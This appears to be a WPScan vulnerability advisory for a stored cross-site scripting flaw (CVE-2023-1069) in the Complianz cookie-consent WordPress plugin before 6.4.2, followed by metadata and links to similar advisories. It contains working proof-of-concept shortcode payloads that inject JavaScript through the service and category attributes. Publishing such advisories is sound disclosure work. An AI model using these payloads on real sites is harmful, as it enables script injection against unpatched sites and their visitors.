Complianz – GDPR/CCPA Cookie Consent < 6.4.2 – Contributor+ Stored XSS | CVE 2023-1069 | Plugin Vulnerabilities

Description

The plugins do not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

[cmplz-consent-area service='"onmouseover=alert(/XSS-service/)//']a[/cmplz-consent-area]
[cmplz-consent-area category='"onmouseover=alert(/XSS-category/)//']a[/cmplz-consent-area]

And move the mouse over the generated link to trigger the XSS


Payload to trigger the XSS w/o interaction (the category attribute is also affected, with another payload):
[cmplz-consent-area service="')){}};alert(/XSS-service-js/); function b(){ if (cmplz_has_service_consent('a"]a[/cmplz-consent-area]

Affects Plugins

Fixed in 6.4.2

complianz-gdpr-premium

Fixed in 6.4.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

caacc50c-822e-46e9-bc0b-681349fd0dda

Timeline

Publicly Published

2023-03-06 (about 2 years ago)

Added

2023-03-06 (about 2 years ago)

Last Updated

2023-03-06 (about 2 years ago)

Other

Published

Title

Published

2025-12-23

Title

Responsive Posts Carousel Pro < 15.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-12-07

Title

Ibtana – WordPress Website Builder < 1.2.2.1 - Contributor+ Stored XSS via Shortcode

Published

2023-10-18

Title

Responsive Image Gallery, Gallery Album <= 2.0.3 - Unauthenticated Stored XSS

Published

2019-08-10

Title

PPOM for WooCommerce <= 18.3 - Authenticated Stored XSS

Published

2023-11-06

Title

Martins Free & Easy SEO Link buildings < 1.2.30 - Reflected XSS